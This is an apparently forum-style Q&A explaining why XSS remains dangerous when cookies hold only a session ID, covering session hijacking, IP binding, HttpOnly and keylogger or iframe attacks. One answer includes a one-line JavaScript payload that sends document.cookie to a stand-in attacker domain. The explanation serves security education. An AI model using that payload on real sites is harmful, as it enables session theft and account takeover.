
Is XSS dangerous even if the cookie doesn't store user credentials?

Whenever someone talks about the dangers of XSS, they mention that the 'bad guys' can get access to user credentials. But if I only store a session ID in the cookie, and authenticate the user based on the session ID, are there any other ways XSS can be used to access user credentials?

Yes.

XSS means a foreign or malicious script is running on the page. There are a bunch of ways this could be dangerous.

Session Hijacking

Even if the cookie doesn't store user credentials (and it shouldn't), it stores enough information for the server to consider the bearer of the cookie to be a particular user (HTTP is stateless, so we use cookies/sessions to remember users).

So if someone steals the session ID they can use it to impersonate you, and the server might be none the wiser.

Safeguarding with IP

In your original question you asked about another level of security: verifying the IP address tied to the session. Yes, that cuts down the attack avenue. Yes, IP addresses can be faked. But you're no longer the lowest-hanging fruit for attackers. At the same time, security and convenience are opposites, so your legitimate users might be frustrated that when their IP address changes they are no longer signed in.

Other attacks

Stealing the cookie/session is one easy way to gain access, but not the only one.

Since a script is running (supposedly) from the trusted site and in the user's browser, it could do a lot of things:

  • load an invisible iframe for the account edit page and reset the password/email for the user
  • load a keylogger, then show the user the login page

Unless the Session ID cookie is marked as HttpOnly, the session can still be hijacked using XSS.

e.g.

new Image().src = 'http://www.example.com/?cookie=' + escape(document.cookie);

will send the Session ID to the attacker's domain (www.example.com), where they will be able to set their own cookie to the same Session ID and steal the session.

Even without the cookie risk, as the attacker can inject whatever they like into the page, they could alter any page content or install key loggers in the browser session.

I recently went to a talk that described ways to trick a password manager into filling out a password form, provided that the attacker could use XSS to modify pages on the victim site. That's one way an attacker might be able to access user credentials.
